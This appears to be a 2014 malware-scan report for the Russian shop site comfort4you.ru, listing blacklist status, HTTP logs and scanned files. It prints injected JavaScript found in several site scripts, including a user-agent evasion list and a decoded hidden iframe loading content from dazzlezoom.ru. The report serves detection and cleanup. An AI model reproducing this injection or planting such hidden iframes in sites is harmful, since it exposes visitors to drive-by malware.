Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=comfort4you.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://comfort4you.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://comfort4you.ru/ | 200 OK Content-Length: 35006 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.mag1.ru <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" > <head> <base href="http://comfort4you.ru/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords ...[4461 bytes skipped]... | ||
http://comfort4you.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 28668 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros }}, subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };;; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://comfort4you.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 5467 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros switch(cmd) { case 'as': if(obj){eval("obj."+property+"=data;");} break; case 'al': if(data){alert(data);} break; case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); };; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://comfort4you.ru/media/system/js/mootools-uncompressed.js | 200 OK Content-Length: 185112 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros this.elements.each(function(el, i){ obj[i] = {}; var hide = (i != index) || (this.options.alwaysHide && (el.offsetHeight > 0)); this.fireEvent(hide ? 'onBackground' : 'onActive', [this.togglers[i], el]); for (var fx in this.effects) obj[i][fx] = hide ? 0 : el[this.effects[fx]]; }, this); return this.start(obj); }, showThisHideOpen: function(index){return this.display(index);} }); Fx.Accordion = Accordion; ;; Antivirus reports:
| ||
http://comfort4you.ru/media/system/js/caption.js | 200 OK Content-Length: 3452 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[2590 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://comfort4you.ru/templates/rt_replicant2_j15/js/rokfonts.js | 200 OK Content-Length: 3386 Content-Type: application/javascript | clean |
http://comfort4you.ru/templates/rt_replicant2_j15/js/rokmoomenu.js | 200 OK Content-Length: 6334 Content-Type: application/javascript | clean |
http://comfort4you.ru/templates/rt_replicant2_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 2453 Content-Type: application/javascript | clean |
http://comfort4you.ru/templates/rt_replicant2_j15/js/roksplitmenu.js | 200 OK Content-Length: 3185 Content-Type: application/javascript | clean |
http://comfort4you.ru/modules/mod_virtuemart_universal/files/jquery_tooltip.js | 200 OK Content-Length: 2102 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros var my_tooltip = $("#"+name+i); $(this).removeAttr("title").mouseover(function(){ my_tooltip.css({opacity:1, display:"none"}).fadeIn(400); }).mousemove(function(kmouse){ my_tooltip.css({left:kmouse.pageX+15, top:kmouse.pageY+15}); }).mouseout(function(){ my_tooltip.fadeOut(400); }); }); } $(document).ready(function(){ simple_tooltip(".mod_vm_universal a","tooltip"); });;; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://comfort4you.ru/o-kompanii/kontakty.html | 200 OK Content-Length: 21987 Content-Type: text/html | clean |
http://comfort4you.ru/obratnaya-svyaz/obratnaya-svyaz.html | 200 OK Content-Length: 24039 Content-Type: text/html | clean |
http://comfort4you.ru/media/system/js/validate.js | 200 OK Content-Length: 5735 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros el.labelref = label; } }); } if (state == false) { el.addClass('invalid'); if (el.labelref) { $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });;; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://comfort4you.ru/magazin.html | 200 OK Content-Length: 26536 Content-Type: text/html | clean |
http://www.comfort4you.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja-zeolite&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 62244 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros new Fx.Style(this.container, 'opacity', { duration:250, onComplete: function() { window.removeEvent('scroll', this.eventPosition).removeEvent('resize', this.eventPosition); if (this.options.overlay) { this.overlay.remove(); } try{ this.container.remove(); } catch(e){} }.bind(this) }).custom(1, 0); } }); MooPrompt.implement(new Chain);;; Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: comfort4you.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Sep 2014 03:53:42 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Sep 2014 03:53:46 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=1cenb38tpvehf62plrh9ja9gv1; path=/
Set-Cookie: virtuemart=1cenb38tpvehf62plrh9ja9gv1
Set-Cookie: virtuemart=1cenb38tpvehf62plrh9ja9gv1
X-Died: timeout at scan.pm line 1546.
X-Powered-By: PHP/5.3.10-1~dotdeb.1
GET / HTTP/1.1
Host: comfort4you.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Sep 2014 03:53:42 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Sep 2014 03:53:46 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=1cenb38tpvehf62plrh9ja9gv1; path=/
Set-Cookie: virtuemart=1cenb38tpvehf62plrh9ja9gv1
Set-Cookie: virtuemart=1cenb38tpvehf62plrh9ja9gv1
X-Died: timeout at scan.pm line 1546.
X-Powered-By: PHP/5.3.10-1~dotdeb.1
Second query (visit from search engine):
GET / HTTP/1.1
Host: comfort4you.ru
Referer: http://www.google.com/search?q=comfort4you.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: comfort4you.ru
Referer: http://www.google.com/search?q=comfort4you.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.